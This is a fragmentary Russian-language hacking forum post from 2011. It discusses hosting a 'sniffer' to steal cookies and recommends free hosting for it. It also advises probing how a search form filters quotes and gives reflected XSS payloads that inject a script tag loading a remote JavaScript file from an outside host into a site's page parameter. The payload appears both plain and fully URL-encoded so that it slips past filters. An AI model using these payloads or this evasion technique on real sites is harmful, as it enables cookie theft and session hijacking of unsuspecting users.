12.04.2011, 01:00
|
|
Участник форума
Регистрация: 11.03.2011
Сообщений: 182
С нами:
7985846
Репутация:
5
|
|
Цитата:
Сообщение от lagranj
а бесплатный хостинг для снифера посоветуете актуальный?
holm.ru
Добавлено через 1 минуту
Цитата:
Сообщение от M@ZAX@KEP
Так я ничего не скажу. Это надо видеть твою формочку поиска и её исходный код. И потыкать разными способами, поэкспериментировать. Например, каким образом фильтрует двойную кавычку? Отбрасывает или заменяет другим символом?
HTML highlight
Код:
alert()" name="search"/>
Добавлено через 17 минут
Цитата:
Способ 3: кодируем в url ядовитую часть ссылки. Кодировать можно тут. Получим ссылку такого вида:
Цитата:
httр://site.com/index.php?page=%3CSCRIPT%20type%3Dtext%2Fjavascrip t%20src%3Dhttp% 3A%2F%2Fhttpz.ru%2Fg4cuwl48edgo.js%3E%3C%2FSCRIPT% 3E%22
Кодировать лучше тут
Было :
PHP highlight
Код:
Код:
http://site.com/index.php?page="
Стало:
code:
http://site.com/index.php?page=%3C%53%43%52%49%50%54%20%74%79%70%6 5%3D%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74% 20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%74%74%70%7A %2E%72%75%2F%67%34%63%75%77%6C%34%38%65%64%67%6F%2 E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E%22 |
|
|